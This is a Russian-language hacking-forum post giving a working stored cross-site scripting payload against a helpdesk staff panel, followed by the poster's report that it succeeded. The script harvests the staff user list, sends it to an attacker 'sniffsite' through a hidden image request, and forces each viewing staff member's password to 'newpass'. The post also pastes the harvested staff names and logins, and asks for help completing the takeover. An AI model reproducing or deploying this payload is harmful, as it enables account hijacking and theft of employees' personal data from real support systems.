11.02.2012, 14:58
|
|
Новичок
Регистрация: 24.04.2011
Сообщений: 0
Провел на форуме:
0
Репутация:
0
|
|
Сообщение от None
ipt>window.onload=init; function init() {document.body.innerHTML +=('put id="change" value="0" type="hidden">');document.body.innerHTML += ('ame id="loginframe" name="loginframe" style="display:none;" src="http://supportsite/staff/index.php?_m=core&_a=composeprvmsg" onload="login();">ame>');}function login() {if (document.getElementById('change').value==0) {var opt = window.frames['loginframe'].document.forms['swiftform'].elements['staffid[]'].innerHTML;opt = opt.split('OPTION').join('');opt = opt.split('').join('');opt = opt.split('"').join('');opt = opt.split('=').join('');opt = opt.split('selected').join('');opt = opt.split('value').join('');opt = opt.split('option').join('');opt = "http://sniffsite/snif/s.gif?users=" + escape(opt); document.body.innerHTML += ('g name=imname src="'+opt+'" width="0" height="0" border="0">'); document.imname.src = opt+"&"+Math.random(); document.getElementById('change').value = 1;init2(); }}; function init2() {document.body.innerHTML +=('put id="change2" value="0" type="hidden">');document.body.innerHTML += ('ame id="passframe" name="passframe" style="display:none;" src="http://supportsite/staff/index.php?_m=core&_a=changepassword" onload="pass();">ame>');}function pass() {if (document.getElementById('change2').value==0) {window.frames['passframe'].document.forms['staffform'].elements['password'].value = 'newpass';window.frames['passframe'].document.forms['staffform'].elements['passwordconfirm'].value = 'newpass';window.frames['passframe'].document.forms['staffform'].submit();document.getElementById('change2').value = 1;}}ript>
Экспойт сработал , пришло сообщение такого вида:
Сообщение от None
%u0415%u0432%u0433%u0435%u043D%u0438%u044F %u 041C%u0430%u043B%u043E%u0432%u0430 (jenny) %u0415%u0432%u0433%u0435%u043D%u0438%u044F %u 041C%u044B%u0440%u0437%u0430%u043B%u0438%u0435%u04 32%u0430 (evm) %u041C%u0430%u043A%u0441%u0438%u043C %u0413%u 0430%u0448%u043A%u043E%u0432 (max) %u0420%u0443%u0441%u043B%u0430%u043D %u041C%u 0430%u0440%u044D (ruslan) %u0421%u0435%u0440%u0433%u0435%u0439 %u0412%u 0435%u0440%u043D%u0438%u0433%u043E%u0440%u0430&nbs p;(sergey) %u0421%u0435%u0440%u0433%u0435%u0439 %u041D%u 0438%u043A%u0438%u0442%u0435%u043D%u043A%u043E%u04 32 (nikitenkov)
Судя по всему просмотрен тикет был юзером ruslan , на какой новый пароль должен был смениться? Судя по коду "newpass" ? но он не подходит .
|
|
|